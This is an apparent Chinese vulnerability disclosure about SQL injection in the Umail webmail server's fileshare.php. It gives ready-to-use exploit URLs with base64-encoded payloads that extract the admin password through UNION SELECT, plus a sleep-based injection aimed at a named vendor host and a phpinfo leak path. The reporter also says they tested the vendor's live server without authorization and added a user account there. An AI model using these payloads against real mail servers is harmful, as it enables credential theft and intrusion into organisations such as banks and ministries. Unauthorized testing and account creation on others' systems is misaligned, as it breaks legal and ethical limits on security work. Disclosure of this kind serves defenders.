Umail最新版本sql注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 服务器的企业和政府应该挺多的, 在官网看了下,客户有中国电信、中国人民银行、外交部等等,希望尽快通知厂商处理吧 ### 详细说明: 漏洞exp: http://xxxx/webmail/fileshare.php?inmail=1&file=MScgdW5pb24gc2VsZWN0IDEsMiwzLDQsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHdlYl91c3Igd2hlcmUgdXNyX25hbWU9J2FkbWluJyksNiw3LDgsOSwxMCwxMSwxMiwxMywxNCM= (flie的内容为注射语句的base64加密,无视GPC) sleep的exp: http://mail.comingchina.com/webmail/fileshare.php?file=MTEzMycgYW5kIHNsZWVwKDEwKT4wIw phpinfo信息泄露: http://xxxx/webmail/info.php 官网邮箱服务器测试,服务器是台虚拟机,由于未授权,未进一步渗透内网,仅仅添加了一个test的用户: [<img src="https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png" alt="23.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png) ### 漏洞证明: 官网邮箱服务器测试: [<img src="https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png" alt="23.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201307/25110145639afff5e42d8df13fc5ee52bb636323.png)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息